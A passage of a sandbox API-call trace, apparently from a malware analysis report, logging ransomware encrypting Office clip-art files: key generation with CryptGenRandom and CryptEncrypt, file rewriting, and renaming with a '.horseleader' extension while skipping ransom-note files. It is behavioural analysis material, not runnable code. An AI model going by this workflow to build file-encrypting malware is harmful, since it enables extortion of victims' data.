(lpString1="AG00021_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.307] lstrcmpW (lpString1="AG00021_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.307] lstrlenW (lpString=".testttjffg") returned 11 [0252.307] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.307] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.307] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 67 [0252.308] StrStrW (lpFirst="AG00021_.GIF", lpSrch=".txt") returned 0x0 [0252.308] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14873) returned 1 [0252.308] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3a19, lpOverlapped=0x0) returned 1 [0252.311] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc5e7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.312] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3a19, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3a19, lpOverlapped=0x0) returned 1 [0252.312] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.312] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.312] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.312] CloseHandle (hObject=0x158) returned 1 [0252.312] GetProcessHeap () returned 0x780000 [0252.313] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.313] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.horseleader") returned 79 [0252.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.horseleader")) returned 1 [0252.314] GetProcessHeap () returned 0x780000 [0252.314] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.314] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64147500, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64147500, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1a1c, dwReserved0=0x7e1110, 
dwReserved1=0xd3dda4fd, cFileName="AG00037_.GIF", cAlternateFileName="")) returned 1 [0252.314] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="Windows") returned -1 [0252.314] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 67 [0252.314] StrStrIW (lpFirst="AG00037_.GIF", lpSrch=".horseleader") returned 0x0 [0252.314] lstrcmpW (lpString1="AG00037_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.314] lstrcmpW (lpString1="AG00037_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.314] lstrlenW (lpString=".testttjffg") returned 11 [0252.314] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.314] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.315] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.315] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 67 [0252.315] StrStrW (lpFirst="AG00037_.GIF", lpSrch=".txt") returned 0x0 [0252.315] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6684) returned 1 [0252.315] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a1c, 
lpOverlapped=0x0) returned 1 [0252.318] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5e4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.318] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a1c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a1c, lpOverlapped=0x0) returned 1 [0252.318] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.318] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.319] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.319] CloseHandle (hObject=0x158) returned 1 [0252.319] GetProcessHeap () returned 0x780000 [0252.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.horseleader") returned 79 [0252.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.horseleader")) returned 1 [0252.320] GetProcessHeap () returned 0x780000 [0252.320] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 
[0252.320] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47589c00, ftCreationTime.dwHighDateTime=0x1bf325d, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47589c00, ftLastWriteTime.dwHighDateTime=0x1bf325d, nFileSizeHigh=0x0, nFileSizeLow=0xcb3, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00038_.GIF", cAlternateFileName="")) returned 1 [0252.320] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="Windows") returned -1 [0252.320] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 67 [0252.320] StrStrIW (lpFirst="AG00038_.GIF", lpSrch=".horseleader") returned 0x0 [0252.320] lstrcmpW (lpString1="AG00038_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.321] lstrcmpW (lpString1="AG00038_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.321] lstrlenW (lpString=".testttjffg") returned 11 [0252.321] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.321] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.321] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 67 [0252.322] StrStrW (lpFirst="AG00038_.GIF", lpSrch=".txt") returned 0x0 [0252.322] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3251) returned 1 [0252.323] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xcb3, lpOverlapped=0x0) returned 1 [0252.341] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff34d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.341] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xcb3, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xcb3, lpOverlapped=0x0) returned 1 [0252.342] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.342] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.342] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.342] CloseHandle (hObject=0x158) returned 1 [0252.346] GetProcessHeap () returned 0x780000 [0252.346] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.346] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.horseleader") returned 79 [0252.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.horseleader")) returned 1 [0252.348] GetProcessHeap () returned 0x780000 [0252.348] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.348] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f4fc100, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f4fc100, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00040_.GIF", cAlternateFileName="")) returned 1 [0252.348] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="Windows") returned -1 [0252.348] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 67 [0252.348] StrStrIW (lpFirst="AG00040_.GIF", lpSrch=".horseleader") returned 0x0 [0252.349] lstrcmpW (lpString1="AG00040_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.349] lstrcmpW (lpString1="AG00040_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.349] lstrlenW (lpString=".testttjffg") returned 11 [0252.349] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.349] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.349] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 
1 [0252.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 67 [0252.350] StrStrW (lpFirst="AG00040_.GIF", lpSrch=".txt") returned 0x0 [0252.350] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8097) returned 1 [0252.350] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1fa1, lpOverlapped=0x0) returned 1 [0252.367] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe05f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.367] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1fa1, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1fa1, lpOverlapped=0x0) returned 1 [0252.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.368] CloseHandle (hObject=0x158) returned 1 [0252.368] GetProcessHeap () 
returned 0x780000 [0252.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.369] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.horseleader") returned 79 [0252.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.horseleader")) returned 1 [0252.370] GetProcessHeap () returned 0x780000 [0252.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.370] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262e5400, ftCreationTime.dwHighDateTime=0x1bd4c10, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x262e5400, ftLastWriteTime.dwHighDateTime=0x1bd4c10, nFileSizeHigh=0x0, nFileSizeLow=0x1e06, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00052_.GIF", cAlternateFileName="")) returned 1 [0252.370] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="Windows") returned -1 [0252.370] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 67 [0252.370] StrStrIW (lpFirst="AG00052_.GIF", lpSrch=".horseleader") returned 0x0 [0252.370] lstrcmpW (lpString1="AG00052_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.370] lstrcmpW (lpString1="AG00052_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.370] lstrlenW (lpString=".testttjffg") returned 11 [0252.370] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 67 [0252.372] StrStrW (lpFirst="AG00052_.GIF", lpSrch=".txt") returned 0x0 [0252.372] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7686) returned 1 [0252.372] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e06, lpOverlapped=0x0) returned 1 [0252.379] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe1fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.379] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e06, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e06, lpOverlapped=0x0) returned 1 [0252.379] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.379] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.379] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.380] CloseHandle (hObject=0x158) returned 1 [0252.380] GetProcessHeap () returned 0x780000 [0252.380] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.380] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.horseleader") returned 79 [0252.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.horseleader")) returned 1 [0252.381] GetProcessHeap () returned 0x780000 [0252.381] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.381] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6b4200, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b6b4200, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00057_.GIF", cAlternateFileName="")) returned 1 [0252.381] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="Windows") returned -1 [0252.381] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 67 [0252.382] StrStrIW (lpFirst="AG00057_.GIF", lpSrch=".horseleader") returned 0x0 [0252.382] lstrcmpW (lpString1="AG00057_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.382] lstrcmpW (lpString1="AG00057_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.382] lstrlenW (lpString=".testttjffg") returned 11 [0252.382] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.382] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.382] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 67 [0252.383] StrStrW (lpFirst="AG00057_.GIF", lpSrch=".txt") returned 0x0 [0252.383] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11891) returned 1 [0252.383] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2e73, lpOverlapped=0x0) returned 1 [0252.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd18d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.386] WriteFile (in: hFile=0x158, 
